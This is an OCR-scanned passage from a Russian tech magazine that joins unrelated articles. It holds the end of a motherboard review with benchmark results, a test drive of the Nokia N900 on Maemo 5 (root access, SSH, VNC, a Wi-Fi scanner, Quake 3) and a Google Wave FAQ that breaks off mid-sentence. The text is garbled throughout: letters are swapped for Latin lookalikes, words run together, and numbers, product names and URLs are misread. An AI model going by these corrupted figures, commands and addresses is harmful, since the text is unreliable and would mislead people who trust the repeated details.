здорового прагматизма, хотелось бы отметить, что за все прелести 
А51І5 МАХІМИБ III Еогтиіа потенциальному покупателю придется 
выложить кругленькую сумму. Но к чему все эти тлетворные эмана- 
ции золотого тельца, если нельзя потратить их на платформу своей 

мечты? □С 



РЕЗУЛЬТАТЫ ТЕСТИРОВАНИЯ 



5ирег РІ тосі. 1.5X5: 15,1 сек 

5ирег РІ тосі. 1.5X5, (ОС): ІО.Зсек 

ѴѴіпРАР 3.8, МиШіЬгеасІіпд: 2525 Кб/с 

ѴѴіпРАР 3.8, МиШіЬгеасІіпд (ОС): 2978 Кб/с 

РСМагк Ѵапіаде: 6846 

РСМагк Ѵапіаде (ОС): 841 1 

Сгузіз, 1680x1050, 4хАА, ІбхАР: 19 

Сгузіз, 1680x1050, 4хАА, 1 6хАР (ОС): 20 

Саіі оі йиіу: ѴѴогІсІ аі ѴѴаг, 1 680x1050, 4хАА, 1 6хАР: 

76 

Саіі оі йиіу: ѴѴогІсІ аі ѴѴаг, 1 680x1050, 4хАА, 1 6хАР: 
79 



КОНКУРС АЗЦЗ 

Заходи на сайтѵѵѵѵѵѵ.хакер.ги и при- 
нимай участие в конкурсе компании 
А51І5 и редакции з:. Все, что требуется 
в конкурсе — правильно ответить на 
5 вопросов о материнской плате А5Ц5 
МАХіМЫЗ III Рогтиіа. 

Разыгрывается гпАТХ плата на чипсе- 
те Р55 — Р7Р55-М и два сувенирных 
набора А51І5: ВТ-мышь, наушники и 
веб-камера. 
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ТЕСТ-ДРАЙВ ПЛАТФОРМЫ МАЕМО 5 В ЫОКІА N900 

Телефоны на базе Ыпих’а мы видели не раз. Но выход смартфона на но- 
венькой Меагтю 5, по сути, являющейся ОеЬіап’ом, да еще 
и на машинке с характеристиками, сравнимыми с компьютером, мы 
пропустить не могли. А потому решили посмотреть, на что же способен 
этот мобильный линукс и нужен ли он вообще? 



Что такое Маето? Это специальная платформа для портативных уст- 
ройств, основанная на дистрибутиве ЭеЬіап бЫІІ/ипих. Если помнишь, 
N окіа выпускала довольно странные для обычного человека девайсы 
Ы770/М800/Ы810: далеко не каждый понимал, зачем нужен интернет- 
планшет, если по нему нельзя позвонить? Объяснять им, в чем прикол 
системы, на которой запускаются линуксовые приложения, бестолку: 
все равно ничего не поймут. Ксчастьютеперь, когда в новенькой N окіа 
N900 появился телефонный модуль, «ушастые» могут радоваться 
навороченному интерфейсу, а мы насладиться тем, зачем собственно 
такой аппарат и покупаем — его линуксовой начинкой. Тут надо сказать, 
что N900 — это пока единственный девайс, который выпускается на 
новой платформе Маето 5 (до этого момента использовались версии 
052005, 052006, 052007 и 052008]. Впрочем, отом, что внутри телефона 
установлен Ыпих, обычный пользователь никогда не догадается. Ведь 
на базеХ.огд’а ему предлагается удобный тач-интерфейс, практически 
исключающий использование стилуса (сказать по правде, я даже не 
сразу его заметил, а необходимости в нем банально не было], который 



крутится вокруг системы четырех рабочих столов, переключение между 
которыми осуществляется легким движением пальца. Причем, каждый 
из них полностью настраиваемый благодаря системе передвигаемых 
ярлыков и виджетов. Скажем, на одном рабочем столе можно размес- 
тить все для работы стелефоном, а на другом — приложений и виджеты 
для администрирования локалки (ато! читай ниже]. Единственное, что 
явно выдаетлинуксовую натуру Маето 5 — это ярлыкХТегтіпаІ в меню 
приложений. 

ТЕРМИНАЛ ПРЯМО НАТЕЛЕФОНЕ 

Да-да, после нажатия на ярлыкоткрывается самый настоящий линук- 
совыйтерминал. Поначалу, правда, удивило, что система не распознает 
самые, казалось бы, стандартные команды: «ипате -а» или «ііюопЛд». 
Ксчастью, для решения достаточно зайти в систему под рутом. Маето 
5 и соответственно N900 выгодно отличается от других аналогичных 
платформ, где для получения доступа к гооЕу надо заливать специаль- 
ную хакнутую прошивку, устанавливать ]аіІЬгаке’и — короче, идти на 
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N 900 МОЖЕТ БЫТЬ ПРОСТО ТЕЛЕФОНОМ... 



всяческиеухищрения. Достаточно открыть в N900 консоль (кстати, как 
и в обычной системе для этого есть горячая клавиша: <СігІ-5ЫГС-х>) и 
набрать команду «зибо даіпгооі» — и рут, в прямом смысле слова, у нас 
в кармане: 

Ыокіа-Ы900-42-11 : ~# ипаше -а 

Ьіпих Ыокіа-№00-42-11 2.б.28-отар1 #1 РКЕЕМРТ Ше й Оск 
28 15:32:55 ЕЕТ 2 0 09 агшѵ71 ипкпоѵт 

№экіа-Ш00-42-11 : ~# ѵкЬоаті 
гоок 



причины залезаем в настройки каталогов приложений и обращаем вни- 
мание, что репозиторий Маето ЕхТгаз не активен. Исправляем это недо- 
разумение и одним кликом мыши добавляем в диспетчер новые пакеты, 
одобренные компьюнити Маето, втом числе и заветный гооТзб. Хочу 
сразу сказать: для установки приложений никакой гооТ-аккаунтне нужен, 
но он понадобится, если хочешь поковыряться во внутренностях системы 
или, например, использовать консольный инструмент для управления 
пакетами арі-дек И разуждобралисьдо администратора, то попробуем 
выяснить, на каком железе работает наша машинка. Для того чтобы выяс- 
нить размер внутренней памяти, используем команду 6Т (бізкТгее): 



Правда, я умолчал об одной важной детали. Для того чтобы команда 
«зибо даіпгооі» работала правильно, необходимоустановить в систему 
специальный пакет гооТзб. 

МЕНЕДЖЕР ПАКЕТОВ И ВСЕ-ВСЕ-ВСЕ 

Установить пакет— ничего не напоминает? Именно! Каки в лю- 
бой ОеЬіап-системе приложения необязательно компилировать из 
исходников: они легко устанавливаются в систему через менеджер 
пакетов. Последний сам заботится отом, чтобы скачать самую послед- 
нюю версию приложения и удовлетворить все зависимости. Вспомним 
ВутЬіап, где для установки программы нужно было найти зіз-файл 
дистрибутива, далее заморочиться с подписями и вдобавок подключить 
телефон к компьютеру. Почувствуй разницу: в случае с Маето необхо- 
димо, чтобы программа была в каталоге приложений. Единственное, что 
тогда придется сделать — это выбрать ее для установки в диспетчере 
приложений. Система сама подкачает ди стр и бути в из репозитория, 
удовлетворив все зависимости. 

Кстати о репозиториях. Поумолчанию в диспетчере приложений 
включены только два: «Приложения N о к і а » и «Обновление системного 
ПО Ыокіа», и поэтому весь списокдоступных для установки приложений 
состоит из максимум двадцати виджетов и утилит. Не сильно впечатляет, 
правда? И болеетого — среди них нет нужного нам пакета гооТзб. В поиске 



Ыокіа-Ы9 00-42 -11 : ~# сік -к 
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Зіге Юзесі АѵаіІаЫе Юзе% 

227. 9М 189. ЗМ 34. 4М 85% / 

1.0М 92. 0к 932. 0к 9% /кшр 

256. 0к 68. 0к 188. 0к 27% /ѵаг/гип 

64. ОМ 4 . 0к 64. ОМ 0% /сіеѵ/зкт 

2. ОС 350. 1М 1.5С 18% /коте 

27. ОС 690. 2М 26. ЗС 2% /коте/ 



В общей сложности — 32 Гб. Теперь посмотрим, чтоу наеза процессор. 
Данные о СРІІ хранятся втекстовом файле/ргос/сриіпію. Откроем его 
тулзой сак 



Ыокіа-М900-42-11 : ~# сак /ргос/сриіпко 
Ргосеззог : АКМѵ7 Ргосеззог геѵ 3 (ѵ71) 

ВодоМІРЗ : 249.96 

Как видишь, в качестве процессора используется С РІО на базе АРМ. 
Правда, вместо частоты здесьуказано количество миллионов опера- 
ций в секунду (ВодоМІРБ], но она составляетбОО МГц. Хочется тутже 
ответить на самый распространенный вопрос по N900: «Раз смартфон 
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РАБОЧИЙ СТОЛ АДМИНА: ЯРЛЫКИ ПРИЛОЖЕНИЙ И 
БЫСТРЫЙ ВЫЗОВ ПРОБЛЕМНОГО ПОЛЬЗОВАТЕЛЯ :) 



МЕНЕДЖЕР ЗАДАЧ ДЛЯ ПЕРЕКЛЮЧЕНИЯ МЕЖДУ 
ЗАПУЩЕННЫМИ ПРИЛОЖЕНИЯМИ 
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построен на Ыпих’е.то можно ли взять .сІеЬ-пакеты отобычного ОеЬіап’а 
и запустить их на мобильной платформе?». Нет и еще раз нет! Как мы 
только что выяснили, процессор N900 построен на базе АРМ, вто время 
как СРИ твоего компьютера, скорее всего, использует х86-архитектуру. 
Исходный код компилируется для разных платформ по-разному, поэтому 
можно даже не пробовать запустить на АРМ’е код, собранный для 
х86-платформы. Болеетого, нетак просто откомпилировать исходники 
линуксового приложения для Маето. В большинстве случаев приложе- 
ния нужно доводить до ума, модифицируя код для работы в совершенно 
новом окружении, втом числе с использованием ІоисЬ-интерфейса, 
акселерометров и т.д. Хорошая новость в том, что профи из комьюнити 
активно занимаются этой работой, а поэтому уже сейчас в репозитории 
огромное количество самых разных никсовыхутилит, втом числе для 
системного администратора! 

АДМИНИСТРИРУЕМ ВСЕ И ВСЯ 

По правде говоря, увидев пакет 0реп55Н Сііепі и Вегѵег, я ринулся уста- 
навливать его в первую очередь. Что порадовало — в моментустановки 
55Н-демона утебя не открывается огромнейшая дыра в лице стандарт- 
ного гооЕового пароля, которые многие пользователи как пить дать 
забудут переустановить (привет іРЬопе’у с установленным іаіібгаке’ом!]. 
Система сама предлагает ввести новый пасс для рута — и мы его 
вводим. Заодноустанавливаем виджет Регзопаі ІР АсИгезз, который 
прямо на рабочем столе отображает названия активных интерфейсов 
и присвоенных им ІР-адресов. Для удобства предлагаю расположить 
виджет на отдельный рабочий стол и сюда же добавить ярлык на X 
Тегтіпаі — с этого начнем строить рабочий стол админа. Открыв РиТТѴ 
на ноутбуке, присоединенном ктой же ѴѴі-Рі сети, я ввел заветный ІР- 
шники... без каких-либо проблем подключился к 55Н -демону, как будто 
это был самый обычный сервак на Ыпих’е. Впрочем, тут же осознав, что 
то же самое можно с неменьшим успехом делать и с самого телефона, 



я переключился на намного более практичную задачу — коннекту к 
различным серверам. Для этого нужно открыть на девайсе терминал и 
отдать команду: ззб <ІР-сервера>. Поверь, разницы стем, какесли быты 
коннектился к ним через РиТТѴ с компьютера, никакой! 

Следующий ярлык, который я вынес на рабочий стол — ѴЫС Ѵіеѵѵег. Тут 
надо сказать, что полноценный клиент для подключения кудаленному 
рабочему столу, который действительно можно удобно использовать с 
телефона, — моя давняя мечта. И хотя можно было сразу попробовать 
поставить гсіезкіор, как на любом линуксе, я решил довериться стан- 
дартному ѴЫС-клиенту, а для экспериментов поднял на буке с ѴѴіпсІоѵѵз 
7 ѴЫС-демон. И вот, что я тебе скажу: с Ы900ты можешь реально поль- 
зоваться своим компьютером удаленно без какого-либо дискомфорта! 

На нормальном коннекте получаем моментальный отклик, идеальную 
картинку — как будто с обычного монитора, причем на большом экране 
девайса вмещается внушительная часть рабочего стола настольной 
машины. Если есть ѴѴі-Рі или ЗС-интернет, эту возможность можно 
использовать постоянно и фактически работать на своем рабочем 
компьютере, используя его производительность и широкий интернет- 
канал. К слову, для отслеживания беспроводных сетей есть отдельный 
замечательный инструмент — ѴѴібіпію. Полноценным стамблером его 
не назовешь, потому что пока он не фиксирует ОРЗ-координаты, но со 
сканированием эфира, определяя 55Ю, уровень сигнала и параметры 
шифрования точекдоступа, справляется на ура. И кстати: сети суязви- 
мым ѴѴЕР-шифрованием программа, каки подобает хакерской тулзе, 
отображает особым образом. 

БРАУЗЕР И МНОГОЗАДАЧНОСТЬ 

Еще больший эффекттого, что имеешь дело не стелефоном, а компью- 
тером, достигается за счет браузера Маето Вгоѵѵзег, построенного на 
базе Могіііа и поддерживающего АбоЬе Еіазб. Весь смак от использо- 
вания начинаешьощущать, когда просматриваешь ролики на ѴоиШЬе (в 
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ѴѴІ-РІ СТАМБЛЕР 



том числе на полном экране) и работаешь с любыми ѴѴеЬ 2.0 сервисами. 
Больше не надо использовать мобильные версии Соодіе Боев и Соодіе 
Неабег или того же СтаіЕ все их АбАХ-навороты отлично отобража- 
ются в Маето В го ѵѵзе г. Атак как это почти Еігеіох.то можно заюзать 
несколько полезных плагинов, заботливо подготовленных комьюнити. 
Расправится разом со всей рекламой поможет АбВІоск Ріиз, а внести 
полезные изменения в сайты с помощью 65-скриптов — Вгеазтопкеу. 
Устанавливаются они опятьже очень просто — через диспетчер при- 
ложений. На однихтолько баннерах (особенно на РІазЬ’овых) можно 
сэкономить кучу СРНЭ-трафика, следить за использованием которого 
удобно через виджет Регзопаі Баіа Ріап Мопііог. Еще один хинтдля 
браузера: горячая клавиша <СМ+8Ы^+І>, которая включаетособую 
систему приближения, подгоняющую параграфы текста так, чтобы они 
соответствовали ширине экрана. 

Использование Ыпих’а позволило реализовать в N900 полноценную 
многозадачность. Ты можешь открыть браузер, консольтерминала с 
запущенным 55Н-клиентом и параллельно переключаться на удален- 
ный рабочий стол через ѴЫС-клиент— и все это будет работать. Для 
таекменеджера даже есть хоткей: <СігІ-5ЫК-Васкзрасе>. Даже если 
среди приложений будет прога, активно использующая ЗБ-графику, она 
неубьет мультизадачность наповал (если, конечно, она не написана на 
коленке горе-программистом). Секреттутвтом, что Маето 5 перекла- 
дываетзадачи по обработке графики на ЗБ-ускоритель ОРБ. 

СШАКЕ 3 Ѵ5. МАЕМО 5 

Насколько эффективно она это делает? Настоящий фурор на одной из 
презентаций N900 в Лондоне произвел запущенный на двух телефонах 
Оиаке 3, в который ребята играли в мультиплеер по сети! Помнится, 
многолетназадя специально покупал новый компьютер — ради того, 
чтобы комфортно играть в квачу. И вот времена — игрушкутянет пускай 
итоповый, но смартфон! Правда, сама портированная версия игрушки 
является чисто экспериментальной и для того, чтобы использовать ее, 
придется подключить специальный репозиторий с бета-версиями про- 
грамм — Ехігаз Беѵеіортепі. Для этого открой диспетчер приложений и 
через меню «Каталоги приложений -> Создать» добавь запись о новом 
хранилище пакетов, указав ЫірУ/герозіІогу.таето.огд/ехІгаз-сІеѵеІ в 
поле «Веб-адрес», «^гетапЛе» в поле «распространение» и «{гее поп- 
ітее» в поле «Компоненты». 

Менеджер пакетов проведетапдейтсписка доступных приложений. Это 
огромноехранилищесамых разных программ, виджетов и игр, которые 
пока находятся в стадии бета-тестирования, но вполне пригодны для 
использования. В частности разработчик пакета іоциакеЗ честно пре- 
дупреждаете возможных багах, но игрушка-то работает! Правда, после 
установки пакета необходимо скопировать файлы *.ркЗ с текстура ми и 
картами с СБ-диска Оиаке 3 в папку /Ьоте/изег/ЬазедЗ. И воттеперь 
можно собирать количество охов и ахов друзей, запуская для них игрушку 
:). Управление осуществляется с помощью акселерометра, а если еще 
подключить через ТѴ-ОиІ к телевизору ,— из N900 получается непло- 
хая игровая консоль! Еще один трик. Если желания маяться с поиском 



старого СБ нет, можно прямо из репозитория установить альтернативу в 
лице орепагепа. Это открытая реализация ОиакеЗ, в которой использует- 
ся открытый движок 03 и созданные энтузиастами карты, модели и набор 
текстур. Не забудь изучить и другие программы в разделе «Мультимедий- 
ные», втом числе подкаст-аггрегатор дРоббегРобсазІ; СІіепЕ 

5КУРЕ И КАМЕРА 

Скачивать подкасты и затем переносить их на телефон — настоящая 
тоска. Если у телефона есть ѴѴі-Рі, то намного удобнее закачивать под- 
касты прямо на него. В связке со встроенным ЕМ-передатчиком, N900 
превращается в настоящий тизібаѵе для автолюбителей. Нужно лишь 
настроить магнитолу на частоту ЕМ-передатчика, и прослушивание 
подкастов в машине превращается в одно удовольствие! 

Устроить трансляцию можно нетолько в аналоговых радиоволнах, но и 
в цифре, вещая в инет изображение с 5-мегапиксельной камеры. Если 
в ранних моделях с Меато для этого нужно было некисло попариться 
с настройкой несколькихтранслирующих программ, то в N900 со всем 
справится миниатюрная утилитка цік, для которой понадобится исклю- 
чительно аккаунт на одноименном сервере. Кстати говоря, качество 
изображения оптики Сагі Хеізз заслуживает всяческих похвал. 

При деле и передняя камера для видеоконференции. Правда, нам, об- 
деленным полноценным ЗО-инетом, придется использовать Экуре или 
Соодіе Таік. Причем позвонить человеку или, на худой конец, начать чат 
можно прямо из профиля человека в записной книжке. Это супер но- 
вовведение: наконец-то не надо открывать скайп и искатьтам нужный 
контакт (который обязательно назван как-нибудь навроде каІуа87), а 
можно просто звонить человеку прямо иззаписной книжки телефона: 
хоть через 05М, хоть через ѴоІР. 

МИНИКОМПЬЮТЕРУ — БЫТЬ! 

Что я тебе могу сказать после недели использования телефона? Это ни 
разу не смартфон! Это мини-компьютер, умеющий, к тому же, звонить. 
Ощущениетого, что имеешь дело не с миниатюрным девайсом, а 
полноценной системой, прежде всего, создаютзнакомые никсовые 
программы. Пускай из-за различий архитектуры нельзя просто взять 
.беЬ-пакетот БеЬіап и установить на N900, но в даже на текущий момент 
втестовых репозиториях есть самые разные продукты: редактор для 
кодинга Ѵіт, интерпретатор Руібоп, клиент Рібдіп для обмена сооб- 
щениями, \МС-клиент и море других. Правильная мультизадачность, 
позволяющая одновременно использовать несколько приложений и 
при этом не наслаждаться слайдшоу, еще больше усиливает ощущение, 
что в N900 все по-взрослому. Браузер на базе Могіііа — это особенная 
история. Наконец-то прямо со смартфона можно просматривать сайты 
в их привычной форме, а не довольствоваться мобильными версиями, 
лишенными прелестей АбАХ. Пониманиетого, насколько классный 
девайс сейчас выпустила №кіа, пришло не сразу. Скажу больше, на 
первый взгляддевайс вообще мало чем впечатлил. Ноуже скоро осоз- 
наешь, что с приобретением N900™ получаешь вовсе не смартфон, а 
стильный мини-компьютер, который умещается в кармане, т 
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6006І.Е ШЕ: 
СТОЯЩИМ СЕРВИС 
ИЛИ ПУСТЫШКА? 

НАШ УЛЬТРА-ПОЛНЫЙ РАО ПО 6006І.Е ШЕ 

«У КОГО ЕСТЬ ИНВАЙТ НА 6006І.Е ШЕ?» - САМАЯ ЧАСТАЯ ПРОСЬБА НА ФОРУМАХ 
И В БЛОГАХ. КАЖДЫЙ ХОЧЕТ ПОПРОБОВАТЬ, КАЖДЫЙ ХОЧЕТ ОЦЕНИТЬ. НО ТАК ЛИ КРУТ 
СЕРВИС, НАСКОЛЬКО ЖЕЛАННЫМ ОН СТАЛ ДЛЯ ОГРОМНОГО ЧИСЛА ПОЛЬЗОВАТЕЛЕЙ? 
в атом МЫ И РЕШИЛИ РАЗОБРАТЬСЯ, собрав ответы на самые частые вопросы. 



0: ВСЕ ВОКРУГ ТРУБЯТ О 600ВІ.Е ШУЕ, 
НТО это ТАКОЕ? 

А: Когда люди описывают боодіе ѴѴаѵе, они 
обычно не скупятся на эпитеты, называя его 
смесью всего, что только можно: е-таіГа, 
чата, ѵѵікі, форума и бог знает чего еще. Я 
хотел написать проще, но... это действительно 
ядерная смесь. Ключевой элемент системы — 
это волны. Что-то среднее между обычным 
письмом и веткой обсуждения на форуме. У 
каждой волны есть отправитель и получатели, 
поэтому волну действительно можно сравнить 
с почтовым отправлением. Создатель волны 
может задать какой-то вопрос и добавить к 
обсуждению других пользователей сервиса, 
которые могут ему отвечать. Но в то же время 
это и не е-таіі, потому что пользователи могут 
не только отвечать в любом месте, но и даже 
редактировать всю ветвь обсуждения. ѴѴікі? 
Опять нет, потому как общение происходит в 
реальном времени, любое изменение момен- 
тально отображается другим участникам волны 



и записывается. Если смотреть с этой стороны, 
то мы получаем инструмент для совместного 
редактирования в реальном времени (плачьте, 
онлайн-сервисы а-ля еіЬеграсІ.сот . ваши дни 
сочтены!], но, в целом, сервис на две головы 
выше, чем просто текстовый редактор. Люди, 
участвующие в волне, необязательно вносят 
изменения, отображаемые всем участникам: 
возможны приватные ответы — как в ІНС-чате, 
но это и не чат. Хотя из волны и можно сделать 
эдакий ІНС-канал, сделав его общедоступным 
и видимым для всех участников системы. 
Правда, дать имя этому каналу нельзя, но 
зато можно обозначить теги — куда нынче без 
них! К тому же, по всей системе, всем волнам 
пользователя и публичным ѵѵаѵе'ам реализо- 
ван поиск, но об этом, учитывая все обстоя- 
тельства, можно даже не говорить. Так что же, 
черт подери, это такое — Соодіе ѴѴаѵе? Я тебе 
скажу: принципиально новый способ общения 
и совместной работы, непривычный и непохо- 
жий на то, что мы видели раньше. 



0: ТОГДА КАК ВЫГЛЯДИТ 
ЭТО ОБЩЕНИЕ? 

к'. Чтобы объяснить суть, буду и далее прово- 
дить аналогии с е-таіГом. Все общение про- 
исходит в волнах. Обсуждение в волне срав- 
нимо с перепиской нескольких людей, сгруп- 
пированной по заголовку в единую цепочку. 
Например, если я хочу обсудить с пікііог'ом и 
догі'ом план на следующий номер, то кликаю 
по ІЧеѵѵ ѴѴаѵе, далее с помощью кнопки АсИ 
рагбсірапТз добавляю парней как участников 
обсуждения и, собственно, пишу сообщение, 
как самое обычное письмо. Причем, в текст 
могут быть вставлены разнообразные видже- 
ты, пусть это будет аддон для голосования по 
теме номера. Когда коллеги зайдут в систему, 
то непременно увидят новую волну в средней 
панели — здесь отображается список волн. 
По умолчанию здесь отображаются волны из 
ІпЬох'а — это что-то вроде папки с входящи- 
ми письмами. Каждый из участников волны 
может оставить ответ, любые изменения ото- 
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► РОЮЕН 5 ® 

СОХРАНИМ ПАРАМЕТРЫ ПОИС- 
КА И НАЗНАЧИМ ДЛЯ ФИЛЬТРОВ 
ЦВЕТА 

бражаются в волне в реальном времени. Если 
к тому времени я буду еще в Сети (а это легко 
узнать по зеленой точке в углу аватарки], то 
увижу, как в ветке обсуждения постепенно 
появляются изменения. И я точно буду знать, 
кто их вносит: рядом с появляющимся тек- 
стом отображается цветной ярлычок с име- 
нем участника, который его набирает. Очень 
удобная фича, чтобы вместе работать над 
каким-нибудь документом или просто устроить 
удаленный брейншторм по важному вопросу. 
Любой участник может отвечать не просто на 
сообщение, а на любой его контекст — и это 
будет понятно отображено. Если участников 
много, а сообщение носит личный характер, 
пользователь может ответить в приватном 
режиме (Ргіѵаіе Меззаде] — и тогда его увидит 
конкретный адресат. Все изменения Ооодіе 
ѴѴаѵе записывает в историю, фиксируя, кто 
и когда что изменил, а благодаря функции 
РІауВаск — позволяет «проиграть» с само- 
го начала весь процесс обсуждения. Едва 
ли функция пригодится, чтобы посмотреть, 
как строился древовидный тред — все и так 
понятно. Но если мы все вместе правили 
какой-то документ или исходник, внося изме- 
нения в разные его части, то быстро просмо- 
треть ход работы и вносимые правки может 
быть полезным. Увы, откатить изменения на 
текущий момент нельзя. Получается, волна — 
это как лист бумаги, на котором разные люди 
что-то рисуют друг другу так, как это им удоб- 
но. Никаких ограничений. 
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ЦВЕТНЫЕ ЯРЛЫЧКИ ПОМОГАЮТ 
ПОНЯТЬ, КТО ВНОСИТ 
ИЗМЕНЕНИЯ 



0: УГОВОРИЛ, ХОНУ ПОПРОБОВАТЬ! 
ТОЛЬКО ГДЕ ВЗЯТЬ ИНВАЙТ 
ДЛЯ РЕГИСТРАЦИИ? 

А: Просто открыть уѵаѵе.доодіе.сот и завести 
аккаунт в сервисе не получится. Ооодіе ѴѴаѵе, 
как известно, находится в стадии закрытого 
тестирования и зарегистрироваться можно 
только по приглашению. Кнопка Недиезі ап 
іпѵіТабоп — чистой воды развод: на давным- 
давно оставленный запрос никакого инвайта 
так и не пришло. Впрочем, как оказалось, 
система с приглашениями еще более запутан- 
ная. Каждый из зарегистрированных пользо- 
вателя получает некоторое количество инвай- 
тов, с помощью которых он может пригласить 
друзей/коллег/знакомых. Но в отличие от 
традиционной системы, когда инвайт сразу же 
отправляется на указанный етаіі-адрес, при- 
глашенный человек попадает в некую очередь 
номинированных для регистрации людей. 
Поэтому, после того как мне пришло сообще- 
ние от приятеля «Отправил тебе инвайт на 
Ооодіе ѴѴаѵе», прошло еще несколько дней, 
прежде чем я получил заветный инвайт. Но тут 
все зависит от того, насколько тебе повезет — 
кому-то приглашение приходит сразу. 

И все-таки, где раздобыть инвайт, если спро- 
сить его не с кого? Ответ прост — найти того, у 
кого эти инвайты имеются :]. Рекомендую прак- 
тически 100% способ. Открываешь поиск по 
блогам Ѵапсіех'а І Ыодз.ѵапсІех.г ], вбиваешь: 
«инвайт Ооодіе ѴѴаѵе» и получаешь десятки 
постов из одного только ЖЖ: «Есть 3/5/20 
инвайтов, кому нужно?». Сервис осуществляет 
поиск и по твиттеру, но для верности советую 
посмотреть ленту твитов с тегом #доодІеѵѵаѵе, 
воспользовавшись родным поисковиком 
зеагсб.іѵѵіііег.соп . Это был первый вариант. 
Теперь второй — воспользоваться специ- 




( уѵйЬ риЫіс 1ад:ги55іап | 

ТО, С ЧЕГО ДОЛЖЕН НАЧАТЬ 
КАЖДЫЙ НОВИЧОК 




альным сервисом для обмена и запроса нуж- 
ного инвайта. На таких сайтах обмениваются 
самыми разными приглашениями: начиная от 
уже пресловутого Ооодіе ѴѴаѵе и заканчивая 
приватными торрент-трекерами. Об одном из 
них — іпѵііег.ги — читай в рубрике ѴѴѴѴѴѴ2. Но 
если и тут не повезет, заходи на Ьгит.хакер. 
ги, где ты найдешь созданную ветку для обме- 
на инвайтами. Уверен, кто-нибудь обязательно 
поможет. 

0: ОКЕЙ, ЗАРЕГИСТРИРОВАЛСЯ. 

НО НИКАК В ТОЛК НЕ ВОЗЬМУ: 

НТО ЗТО ВООБЩЕ ТАКОЕ И КАК ЗТИМ 
ПОЛЬЗОВАТЬСЯ? ЕРУНДА КАКАЯ-ТО! 

А: 0! Практически 100% реакция каждого 
нового пользователя. Не даром Ооодіе выло- 
жил дли-и-и-и-и-инное видео (час двадцать!) 
с презентацией сервиса, чтобы хоть как-то 
объяснять, что к чему. Так или иначе, любой 
пользователь, только что оказавшийся на 
сервисе, непременно сталкивается с одной 
простой, но сложно разрешимой проблемой — 
новый способ общения опробовать банально 
не с кем! Сервис-то закрытый. Никого просто 
так не позовешь. 

По этой причине нужно выучить одно 
важное заклинание «ѵѵіЕЬ : ри Ыіс». Над 
списком волн, в котором должны были 
приветственные волны от системы с еще 
несколькими презентациями, есть поле 
для поиска — важный элемент интерфейса 
Соодіе ѴѴаѵе, с помощью которого можно 
фильтровать отображаемые волны и осу- 
ществлять поиск по ним. По умолчанию 
там выставлено что-то вроде «іпнпЬох», 
обозначающее, что в списке волн долж- 
но быть отображено содержимое твоего 
инбокса. Вводи туда «ѵѵііЬ:риЫіс» — и 
получишь список публично открытых волн, 
с тысячами людей, которые так же, как и 
мы с тобой, не знают, что же в этом Соодіе 
ѴѴаѵе делать :). Попадаются вполне инте- 
ресны волны, в том числе различных тико- 
вых сайтов и коммьюнити (своеобразные 
ветки форума]. Кстати, публичный вейв 
можно создать и самому. Для этого нужно 
добавить в свои контакты пользователя 
риЫісОа.дѵѵаѵе.сопп. Трюк заключается в 
том, что в тот момент, когда ты нажмешь 
на кнопку «Добавить», система выдаст 
сообщение «ІІзег боез поі Ьаѵе а Соодіе 
ѴѴаѵе ассоипі». Игнорируй его и просто 
жми <ЕпІег> — в контакт-листе появится 
новый адресат, который ты можешь доба- 
вить в ту волну, которую хочешь сделать 
публичной. 
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> Ііпкз 

• Документация по 
созданию робота: 
ЫТрѴ/сосІе.доодІе. 
сот/іпІІ/ги/арізА/ѵаѵе/ 
ехІепзіопз/гоЬоІз/ 
іпсІех.ЫппІ . 

• Пример робота, на- 
писанного на С#: 
ЬіІрТ/ѵѵѵѵѵѵ.ЬѵІеЬІоскз. 
сот/розі/2009/1 0/28/ 
СоодІе-ѴУаѵе-ВоЬоІ- 
Реѵеіортепі-Затріе. 
азрх . 

• Пример создания 
гаджета: 

ЬПрУ/сіепсІгуІзобІ:. 
ЬІодзроТот/2009/1 0/ 
Ьиіісііпд-доодіе-ѵѵаѵе- 
дасідеі-ѵѵіііѵдѵѵі. 

Ыті] . 

• Полный список 
горячих клавиш: 
ЬіІрТАл/ѵѵѵѵ.доодІе. 
сот/зиррогі/ 
уѵаѵе/Ьіп/апзѵѵег. 
ру?Ы=еп&апзѵѵег= 
1:62330. 



• Пополняемый 

СПИСОК б0Т0В:Міщ// 

доодІеѵѵаѵеЬоІз.іпІю/ 

саіедогу/доодіе-ѵѵаѵе- 

Ьоіз. 




> ІПІО 

• Безопасность обще- 
ния обеспечивается 
55Б: защищенный 
протокол используется 
на протяжении всего 
времени работы с сер- 
висом, а нетолько 

в моментавторизации. 

• боодіе ѴѴаѵе напи- 
сан на 2аѵа с исполь- 
зованием Ореп^К 
[ орещбкдаѵа.пе ]. 

а веб-интерфейс по- 
строен на фрейворке 
Соодіе ѴѴеЬТооІкіІ 
( сосіе.доодіе.сопп/ 
ѵѵеЫооІкіі ]. 




0: СКОЛЬКО ЖЕ ИХ! КАК ВООБЩЕ 
ОРИЕНТИРОВАТЬСЯ ВО ВСЕХ ЭТИХ ВОЛНАХ? 

А: Очень скоро, наигравшись с публичными волнами, 
которые хоть и интересны, но больше с точки зрения 
демонстрации возможностей системы, захочется исполь- 
зовать сервис с практической точки зрения. Тем более, 
волн действительно очень много. Первое, что нужно 
уяснить, — это возможность навигации, для которой 
используется поисковая панель; здесь, помимо ключевых 
слов для поиска волн, можно вводить служебные слова 
(как ѵѵіТНщиЫіс). Например, чтобы во всем этом хаусе 
найти волны на русском языке, можно отфильтровать их 
по тегам, добавив в запрос модификатор «1;ад:ги». Мы 
о них еще поговорим. А пока взглянем на левую часть 
интерфейса, где находится панель навигации. Она при- 
мечательна тем, что кроме стандартных позиций — Ву Ме 
(волн, созданных тобой], ІпЬох (входящие волны], АН (все 
волны, в которых ты принимаешь участие], Ведиезі: (волны 
от неизвестных контактов], Брат, БеШпдз (да, даже 
настройки сервиса, оформлены в виде волны!], есть раз- 
делы Беагсбез и РоШегз. В первый из них можно сохра- 
нить свои поисковые запросы, чтобы не вводить его каж- 
дый раз вручную. К примеру, чтобы полностью исключить 
из вывода публичные волны, на которые ты успел подпи- 
саться, можно ввести: «іп:іпЬох Іо:<уои>(ЗдоодІе\л/аѵе.сот». 
Первый модификатор включает поиск по инбоксу, второй 
указывает, что отображать нужно волны конкретным адре- 
сатом (твоим адресом]. 

Помимо сохраненных запросов есть также другой меха- 
низм — каталоги (БоШегз]. По сути, полный аналог папок 
из почтового клиента, по которым раскладываются 
письма, — создавай их, сколько нужно. Стандартная 
папка іпбох — любопытная штука. В нее попадают не 
только волны, которые адресованы лично тебе, но и те, в 
которых ты принимал участие. Можно попробовать убрать 
их из инбокса, нажав кнопку АгсЬіеѵе (переместить в 
архив), но как только произойдет обновление волны, она 
тут же появится обратно. Как быть? Проблема в том, что 
